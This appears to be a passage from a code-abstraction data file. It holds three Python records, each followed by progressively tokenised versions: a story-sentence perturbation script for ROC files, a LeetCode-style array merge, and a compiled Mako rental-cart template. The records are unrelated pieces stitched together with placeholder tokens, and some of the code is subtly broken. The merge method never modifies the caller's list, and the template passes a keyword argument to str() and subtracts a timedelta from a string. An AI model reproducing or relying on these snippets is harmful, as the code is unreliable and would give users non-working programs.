data.copy()\n for i in range(5):\n random_data['%d' % (i + 1)] = np.random.permutation(random_data\n ['%d' % (i + 1)])\n for k in range(len(post)):\n idx = np.random.permutation(range(1, 5))[0]\n for i in range(5):\n if i == idx:\n fout.write(' '.join(random_data['%d' % (i + 1)][k]) + '\\n')\n else:\n fout.write(' '.join(data['%d' % (i + 1)][k]) + '\\n')\n fout.write('------\\n')\n", "<import token>\nwith open('./roc.txt', 'r') as fin:\n with open('./roc_shuffle.txt', 'w') as fout:\n tmp = []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n idx = [0] + np.random.permutation(range(1, 5)).tolist()\n for sen in np.take(tmp, idx).tolist():\n fout.write(sen + '\\n')\n tmp = []\n fout.write(line.strip() + '\\n')\n else:\n tmp.append(line.strip())\nwith open('./roc.txt', 'r') as fin:\n with open('./roc_repeat.txt', 'w') as fout:\n tmp = []\n for k, line in 
enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n idx = random.randint(1, 4)\n tmp[idx] = tmp[idx][:-1] + tmp[idx]\n for sen in tmp:\n fout.write(sen + '\\n')\n tmp = []\n fout.write(line.strip() + '\\n')\n else:\n tmp.append(line.strip())\nwith open('./roc.txt', 'r') as fin:\n with open('./roc_replace.txt', 'w') as fout:\n post, tmp = [], []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n post.append(tmp)\n tmp = []\n else:\n tmp.append(line.strip().split())\n data = {'1': [], '2': [], '3': [], '4': [], '5': []}\n for p in post:\n for i in range(5):\n data['%d' % (i + 1)].append(p[i])\n random_data = data.copy()\n for i in range(5):\n random_data['%d' % (i + 1)] = np.random.permutation(random_data\n ['%d' % (i + 1)])\n for k in range(len(post)):\n idx = np.random.permutation(range(1, 5))[0]\n for i in range(5):\n if i == idx:\n fout.write(' '.join(random_data['%d' % (i + 1)][k]) + '\\n')\n else:\n fout.write(' '.join(data['%d' % (i + 1)][k]) + '\\n')\n fout.write('------\\n')\n", "<import token>\n<code token>\n" ]
false
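All three passes above depend on roc.txt being laid out in six-line blocks: five story sentences, then a separator line that the i % 6 == 0 test detects. A toy run of the shuffle perturbation on one such block, assuming that layout (sentence values are invented):

import numpy as np

story = ['s1', 's2', 's3', 's4', 's5']                    # one five-sentence block
idx = [0] + np.random.permutation(range(1, 5)).tolist()   # first sentence stays put
print(np.take(story, idx).tolist())                       # e.g. ['s1', 's4', 's2', 's5', 's3']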
28
4f13e2858d9cf469f14026808142886e5c3fcc85
class Solution:
    def merge(self, nums1, m, nums2, n):
        """
        Do not return anything, modify nums1 in-place instead.
        """
        if n == 0:
            nums1 = nums1
        if nums1[m-1] <= nums2[0]:
            for i in range(n):
                nums1[m+i] = nums2[i]
        elif nums1[0] >= nums2[-1]:
            for i in range(m):
                nums1[i] = nums1[n+i]
        else:
            ans = [None]*len(nums1)
            i = 0
            j = 0
            k = 0
            while i < m and j < n:
                if nums1[i] <= nums2[j]:
                    print("take 1: ", nums1[i])
                    ans[k] = nums1[i]
                    i += 1
                else:
                    print("take 2: ", nums2[j])
                    ans[k] = nums2[j]
                    j += 1
                k += 1
            # NOTE: this rebinds the local name only; the caller's list is
            # unchanged (see the corrected sketch after this record)
            nums1 = ans

if __name__ == "__main__":
    solve = Solution()
    nums1 = [1,2,3,0,0,0]
    m = 3
    nums2 = [2,5,6]
    n = 3
    solve.merge(nums1, m, nums2, n)
    print(nums1)
[ "class Solution:\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n \n if n == 0:\n nums1 = nums1\n if nums1[m-1] <= nums2[0]:\n \n for i in range(n):\n nums1[m+i] = nums2[i]\n \n elif nums1[0] >= nums2[-1]:\n \n for i in range(m):\n nums1[i] = nums1[n+i]\n else:\n ans = [None]*len(nums1)\n i = 0\n j = 0\n k = 0\n \n while i < m and j < n:\n if nums1[i] <= nums2[j]:\n print(\"take 1: \", nums1[i])\n ans[k] = nums1[i]\n i += 1\n else:\n print(\"take 2: \", nums2[j])\n ans[k] = nums2[j]\n j += 1\n k += 1\n\n nums1 = ans\n\nif __name__ == \"__main__\":\n solve = Solution()\n nums1 = [1,2,3,0,0,0]\n m = 3\n nums2 = [2,5,6]\n n = 3\n solve.merge(nums1, m, nums2, n)\n print(nums1)\n\n", "class Solution:\n\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n if n == 0:\n nums1 = nums1\n if nums1[m - 1] <= nums2[0]:\n for i in range(n):\n nums1[m + i] = nums2[i]\n elif nums1[0] >= nums2[-1]:\n for i in range(m):\n nums1[i] = nums1[n + i]\n else:\n ans = [None] * len(nums1)\n i = 0\n j = 0\n k = 0\n while i < m and j < n:\n if nums1[i] <= nums2[j]:\n print('take 1: ', nums1[i])\n ans[k] = nums1[i]\n i += 1\n else:\n print('take 2: ', nums2[j])\n ans[k] = nums2[j]\n j += 1\n k += 1\n nums1 = ans\n\n\nif __name__ == '__main__':\n solve = Solution()\n nums1 = [1, 2, 3, 0, 0, 0]\n m = 3\n nums2 = [2, 5, 6]\n n = 3\n solve.merge(nums1, m, nums2, n)\n print(nums1)\n", "class Solution:\n\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n if n == 0:\n nums1 = nums1\n if nums1[m - 1] <= nums2[0]:\n for i in range(n):\n nums1[m + i] = nums2[i]\n elif nums1[0] >= nums2[-1]:\n for i in range(m):\n nums1[i] = nums1[n + i]\n else:\n ans = [None] * len(nums1)\n i = 0\n j = 0\n k = 0\n while i < m and j < n:\n if nums1[i] <= nums2[j]:\n print('take 1: ', nums1[i])\n ans[k] = nums1[i]\n i += 1\n else:\n print('take 2: ', nums2[j])\n ans[k] = nums2[j]\n j += 1\n k += 1\n nums1 = ans\n\n\n<code token>\n", "class Solution:\n <function token>\n\n\n<code token>\n", "<class token>\n<code token>\n" ]
false
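Because `nums1 = ans` only rebinds the local name (see the note in the record), the driver above actually prints the untouched `[1, 2, 3, 0, 0, 0]`; the merge loop also never copies the leftover tail. A sketch of the usual in-place repair, merging from the back and writing through indices (a plain function here rather than the record's Solution class):

def merge(nums1, m, nums2, n):
    # Fill nums1 from the end; mutating by index is what the caller observes.
    i, j, k = m - 1, n - 1, m + n - 1
    while j >= 0:
        if i >= 0 and nums1[i] > nums2[j]:
            nums1[k] = nums1[i]
            i -= 1
        else:
            nums1[k] = nums2[j]
            j -= 1
        k -= 1

nums1 = [1, 2, 3, 0, 0, 0]
merge(nums1, 3, [2, 5, 6], 3)
print(nums1)   # [1, 2, 2, 3, 5, 6]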
29
57967f36a45bb3ea62708bbbb5b2f4ddb0f4bb16
# -*- coding:ascii -*-
from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 10
_modified_time = 1428612037.145222
_enable_loop = True
_template_filename = 'C:\\Users\\Cody\\Desktop\\Heritage\\chf\\templates/account.rentalcart.html'
_template_uri = '/account.rentalcart.html'
_source_encoding = 'ascii'
import os, os.path, re
_exports = ['content']


from datetime import datetime, timedelta
now = datetime.now()
noww = now.strftime('%B %d, %Y')


def _mako_get_namespace(context, name):
    try:
        return context.namespaces[(__name__, name)]
    except KeyError:
        _mako_generate_namespaces(context)
        return context.namespaces[(__name__, name)]
def _mako_generate_namespaces(context):
    pass
def _mako_inherit(template, context):
    _mako_generate_namespaces(context)
    return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)
def render_body(context,**pageargs):
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs)
        int = context.get('int', UNDEFINED)
        str = context.get('str', UNDEFINED)
        rentals = context.get('rentals', UNDEFINED)
        def content():
            return render_content(context._locals(__M_locals))
        request = context.get('request', UNDEFINED)
        STATIC_URL = context.get('STATIC_URL', UNDEFINED)
        __M_writer = context.writer()
        __M_writer('\r\n')
        __M_writer('\r\n')
        # NOTE: keyword argument to str() -- this line raises TypeError at render time
        __M_writer(str(nowww = noww - timedelta(days=3)))
        __M_writer('\r\n')
        if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'):
            context['self'].content(**pageargs)

        __M_writer('\r\n\r\n')
        return ''
    finally:
        context.caller_stack._pop_frame()


def render_content(context,**pageargs):
    __M_caller = context.caller_stack._push_frame()
    try:
        int = context.get('int', UNDEFINED)
        str = context.get('str', UNDEFINED)
        rentals = context.get('rentals', UNDEFINED)
        def content():
            return render_content(context)
        request = context.get('request', UNDEFINED)
        STATIC_URL = context.get('STATIC_URL', UNDEFINED)
        __M_writer = context.writer()
        __M_writer('\r\n\r\n<table class="table-responsive table-striped">\r\n <th></th>\r\n <th>#</th>\r\n <th>Name</th>\r\n <th>Price per Day</th>\r\n <th># of Days Rented</th>\r\n')
        for item in rentals:
            __M_writer(' <tr>\r\n <td><button rel="')
            __M_writer(str( item.id ))
            __M_writer('" class="btn btn-danger btn-sm deleter">Remove</button></td>\r\n <td class="img-col"><img class="shopping_cart_image" src="')
            __M_writer(str(STATIC_URL))
            __M_writer(str( item.photo.image ))
            __M_writer('"/></td>\r\n <td class="name-col">')
            __M_writer(str( noww ))
            __M_writer('</td>\r\n <td class="price-col">')
            __M_writer(str( item.price_per_day ))
            __M_writer('</td>\r\n <td class="qty-col">')
            __M_writer(str(int(request.session['rental_cart'][str(item.id)])))
            __M_writer('</td>\r\n </tr>\r\n')
        __M_writer('</table>\r\n<table id="button-table" class="table-responsive">\r\n <tr>\r\n <td id="space"></td>\r\n')
        if request.user.is_authenticated():
            __M_writer(' <td id=\'checkout\'><a href="/account.checkout" class="btn btn-warning">Checkout</a></td>\r\n')
        else:
            __M_writer(' <td id=\'checkout\'><a href="/mylogin.cartlogin" class="btn btn-warning">Checkout</a></td>\r\n')
        __M_writer(' </tr>\r\n</table>\r\n')
        return ''
    finally:
        context.caller_stack._pop_frame()


"""
__M_BEGIN_METADATA
{"uri": "/account.rentalcart.html", "line_map": {"70": 8, "71": 16, "72": 17, "73": 18, "74": 18, "75": 19, "76": 19, "77": 19, "78": 20, "79": 20, "80": 21, "81": 21, "82": 22, "83": 22, "84": 25, "85": 29, "86": 30, "87": 31, "88": 32, "89": 34, "95": 89, "33": 0, "16": 2, "45": 1, "46": 6, "47": 7, "48": 7, "53": 36, "59": 8}, "filename": "C:\\Users\\Cody\\Desktop\\Heritage\\chf\\templates/account.rentalcart.html", "source_encoding": "ascii"}
__M_END_METADATA
"""
[ "# -*- coding:ascii -*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1428612037.145222\n_enable_loop = True\n_template_filename = 'C:\\\\Users\\\\Cody\\\\Desktop\\\\Heritage\\\\chf\\\\templates/account.rentalcart.html'\n_template_uri = '/account.rentalcart.html'\n_source_encoding = 'ascii'\nimport os, os.path, re\n_exports = ['content']\n\n\n\nfrom datetime import datetime, timedelta\nnow = datetime.now()\nnoww = now.strftime('%B %d, %Y')\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[(__name__, name)]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[(__name__, name)]\ndef _mako_generate_namespaces(context):\n pass\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)\ndef render_body(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww = noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'):\n context['self'].content(**pageargs)\n \n\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n def content():\n return render_content(context)\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n\\r\\n<table class=\"table-responsive table-striped\">\\r\\n <th></th>\\r\\n <th>#</th>\\r\\n <th>Name</th>\\r\\n <th>Price per Day</th>\\r\\n <th># of Days Rented</th>\\r\\n')\n for item in rentals:\n __M_writer(' <tr>\\r\\n <td><button rel=\"')\n __M_writer(str( item.id ))\n __M_writer('\" class=\"btn btn-danger btn-sm deleter\">Remove</button></td>\\r\\n <td class=\"img-col\"><img class=\"shopping_cart_image\" src=\"')\n __M_writer(str(STATIC_URL))\n __M_writer(str( item.photo.image ))\n __M_writer('\"/></td>\\r\\n <td class=\"name-col\">')\n __M_writer(str( noww ))\n __M_writer('</td>\\r\\n <td class=\"price-col\">')\n __M_writer(str( item.price_per_day ))\n __M_writer('</td>\\r\\n <td class=\"qty-col\">')\n __M_writer(str(int(request.session['rental_cart'][str(item.id)])))\n __M_writer('</td>\\r\\n </tr>\\r\\n')\n __M_writer('</table>\\r\\n<table id=\"button-table\" class=\"table-responsive\">\\r\\n <tr>\\r\\n <td id=\"space\"></td>\\r\\n')\n if request.user.is_authenticated():\n __M_writer(' <td id=\\'checkout\\'><a href=\"/account.checkout\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n')\n else:\n __M_writer(' <td id=\\'checkout\\'><a href=\"/mylogin.cartlogin\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n')\n __M_writer(' </tr>\\r\\n</table>\\r\\n')\n return ''\n finally:\n 
context.caller_stack._pop_frame()\n\n\n\"\"\"\n__M_BEGIN_METADATA\n{\"uri\": \"/account.rentalcart.html\", \"line_map\": {\"70\": 8, \"71\": 16, \"72\": 17, \"73\": 18, \"74\": 18, \"75\": 19, \"76\": 19, \"77\": 19, \"78\": 20, \"79\": 20, \"80\": 21, \"81\": 21, \"82\": 22, \"83\": 22, \"84\": 25, \"85\": 29, \"86\": 30, \"87\": 31, \"88\": 32, \"89\": 34, \"95\": 89, \"33\": 0, \"16\": 2, \"45\": 1, \"46\": 6, \"47\": 7, \"48\": 7, \"53\": 36, \"59\": 8}, \"filename\": \"C:\\\\Users\\\\Cody\\\\Desktop\\\\Heritage\\\\chf\\\\templates/account.rentalcart.html\", \"source_encoding\": \"ascii\"}\n__M_END_METADATA\n\"\"\"\n", "from mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1428612037.145222\n_enable_loop = True\n_template_filename = (\n 'C:\\\\Users\\\\Cody\\\\Desktop\\\\Heritage\\\\chf\\\\templates/account.rentalcart.html'\n )\n_template_uri = '/account.rentalcart.html'\n_source_encoding = 'ascii'\nimport os, os.path, re\n_exports = ['content']\nfrom datetime import datetime, timedelta\nnow = datetime.now()\nnoww = now.strftime('%B %d, %Y')\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[__name__, name]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[__name__, name]\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)\n\n\ndef render_body(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww=noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data[\n 'parent'], 'content'):\n context['self'].content(**pageargs)\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context)\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(\n '\\r\\n\\r\\n<table class=\"table-responsive table-striped\">\\r\\n <th></th>\\r\\n <th>#</th>\\r\\n <th>Name</th>\\r\\n <th>Price per Day</th>\\r\\n <th># of Days Rented</th>\\r\\n'\n )\n for item in rentals:\n __M_writer(' <tr>\\r\\n <td><button rel=\"')\n __M_writer(str(item.id))\n __M_writer(\n '\" class=\"btn btn-danger btn-sm deleter\">Remove</button></td>\\r\\n <td class=\"img-col\"><img class=\"shopping_cart_image\" src=\"'\n )\n __M_writer(str(STATIC_URL))\n __M_writer(str(item.photo.image))\n __M_writer('\"/></td>\\r\\n <td class=\"name-col\">')\n __M_writer(str(noww))\n __M_writer('</td>\\r\\n <td class=\"price-col\">')\n __M_writer(str(item.price_per_day))\n __M_writer('</td>\\r\\n <td class=\"qty-col\">')\n 
__M_writer(str(int(request.session['rental_cart'][str(item.id)])))\n __M_writer('</td>\\r\\n </tr>\\r\\n')\n __M_writer(\n '</table>\\r\\n<table id=\"button-table\" class=\"table-responsive\">\\r\\n <tr>\\r\\n <td id=\"space\"></td>\\r\\n'\n )\n if request.user.is_authenticated():\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/account.checkout\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n else:\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/mylogin.cartlogin\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n __M_writer(' </tr>\\r\\n</table>\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n<docstring token>\n", "<import token>\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1428612037.145222\n_enable_loop = True\n_template_filename = (\n 'C:\\\\Users\\\\Cody\\\\Desktop\\\\Heritage\\\\chf\\\\templates/account.rentalcart.html'\n )\n_template_uri = '/account.rentalcart.html'\n_source_encoding = 'ascii'\n<import token>\n_exports = ['content']\n<import token>\nnow = datetime.now()\nnoww = now.strftime('%B %d, %Y')\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[__name__, name]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[__name__, name]\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)\n\n\ndef render_body(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww=noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data[\n 'parent'], 'content'):\n context['self'].content(**pageargs)\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context)\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(\n '\\r\\n\\r\\n<table class=\"table-responsive table-striped\">\\r\\n <th></th>\\r\\n <th>#</th>\\r\\n <th>Name</th>\\r\\n <th>Price per Day</th>\\r\\n <th># of Days Rented</th>\\r\\n'\n )\n for item in rentals:\n __M_writer(' <tr>\\r\\n <td><button rel=\"')\n __M_writer(str(item.id))\n __M_writer(\n '\" class=\"btn btn-danger btn-sm deleter\">Remove</button></td>\\r\\n <td class=\"img-col\"><img class=\"shopping_cart_image\" src=\"'\n )\n __M_writer(str(STATIC_URL))\n __M_writer(str(item.photo.image))\n __M_writer('\"/></td>\\r\\n <td class=\"name-col\">')\n __M_writer(str(noww))\n __M_writer('</td>\\r\\n <td class=\"price-col\">')\n __M_writer(str(item.price_per_day))\n __M_writer('</td>\\r\\n <td class=\"qty-col\">')\n 
__M_writer(str(int(request.session['rental_cart'][str(item.id)])))\n __M_writer('</td>\\r\\n </tr>\\r\\n')\n __M_writer(\n '</table>\\r\\n<table id=\"button-table\" class=\"table-responsive\">\\r\\n <tr>\\r\\n <td id=\"space\"></td>\\r\\n'\n )\n if request.user.is_authenticated():\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/account.checkout\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n else:\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/mylogin.cartlogin\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n __M_writer(' </tr>\\r\\n</table>\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n<docstring token>\n", "<import token>\n<assignment token>\n<import token>\n<assignment token>\n<import token>\n<assignment token>\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[__name__, name]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[__name__, name]\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)\n\n\ndef render_body(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww=noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data[\n 'parent'], 'content'):\n context['self'].content(**pageargs)\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context)\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(\n '\\r\\n\\r\\n<table class=\"table-responsive table-striped\">\\r\\n <th></th>\\r\\n <th>#</th>\\r\\n <th>Name</th>\\r\\n <th>Price per Day</th>\\r\\n <th># of Days Rented</th>\\r\\n'\n )\n for item in rentals:\n __M_writer(' <tr>\\r\\n <td><button rel=\"')\n __M_writer(str(item.id))\n __M_writer(\n '\" class=\"btn btn-danger btn-sm deleter\">Remove</button></td>\\r\\n <td class=\"img-col\"><img class=\"shopping_cart_image\" src=\"'\n )\n __M_writer(str(STATIC_URL))\n __M_writer(str(item.photo.image))\n __M_writer('\"/></td>\\r\\n <td class=\"name-col\">')\n __M_writer(str(noww))\n __M_writer('</td>\\r\\n <td class=\"price-col\">')\n __M_writer(str(item.price_per_day))\n __M_writer('</td>\\r\\n <td class=\"qty-col\">')\n __M_writer(str(int(request.session['rental_cart'][str(item.id)])))\n __M_writer('</td>\\r\\n </tr>\\r\\n')\n __M_writer(\n '</table>\\r\\n<table id=\"button-table\" class=\"table-responsive\">\\r\\n <tr>\\r\\n <td id=\"space\"></td>\\r\\n'\n )\n if request.user.is_authenticated():\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/account.checkout\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n 
else:\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/mylogin.cartlogin\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n __M_writer(' </tr>\\r\\n</table>\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n<docstring token>\n", "<import token>\n<assignment token>\n<import token>\n<assignment token>\n<import token>\n<assignment token>\n<function token>\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)\n\n\ndef render_body(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww=noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data[\n 'parent'], 'content'):\n context['self'].content(**pageargs)\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context)\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(\n '\\r\\n\\r\\n<table class=\"table-responsive table-striped\">\\r\\n <th></th>\\r\\n <th>#</th>\\r\\n <th>Name</th>\\r\\n <th>Price per Day</th>\\r\\n <th># of Days Rented</th>\\r\\n'\n )\n for item in rentals:\n __M_writer(' <tr>\\r\\n <td><button rel=\"')\n __M_writer(str(item.id))\n __M_writer(\n '\" class=\"btn btn-danger btn-sm deleter\">Remove</button></td>\\r\\n <td class=\"img-col\"><img class=\"shopping_cart_image\" src=\"'\n )\n __M_writer(str(STATIC_URL))\n __M_writer(str(item.photo.image))\n __M_writer('\"/></td>\\r\\n <td class=\"name-col\">')\n __M_writer(str(noww))\n __M_writer('</td>\\r\\n <td class=\"price-col\">')\n __M_writer(str(item.price_per_day))\n __M_writer('</td>\\r\\n <td class=\"qty-col\">')\n __M_writer(str(int(request.session['rental_cart'][str(item.id)])))\n __M_writer('</td>\\r\\n </tr>\\r\\n')\n __M_writer(\n '</table>\\r\\n<table id=\"button-table\" class=\"table-responsive\">\\r\\n <tr>\\r\\n <td id=\"space\"></td>\\r\\n'\n )\n if request.user.is_authenticated():\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/account.checkout\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n else:\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/mylogin.cartlogin\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n __M_writer(' </tr>\\r\\n</table>\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n<docstring token>\n", "<import token>\n<assignment token>\n<import token>\n<assignment token>\n<import token>\n<assignment token>\n<function token>\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base_ajax.htm', 
_template_uri)\n\n\ndef render_body(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww=noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data[\n 'parent'], 'content'):\n context['self'].content(**pageargs)\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n<function token>\n<docstring token>\n", "<import token>\n<assignment token>\n<import token>\n<assignment token>\n<import token>\n<assignment token>\n<function token>\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\n<function token>\n\n\ndef render_body(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n 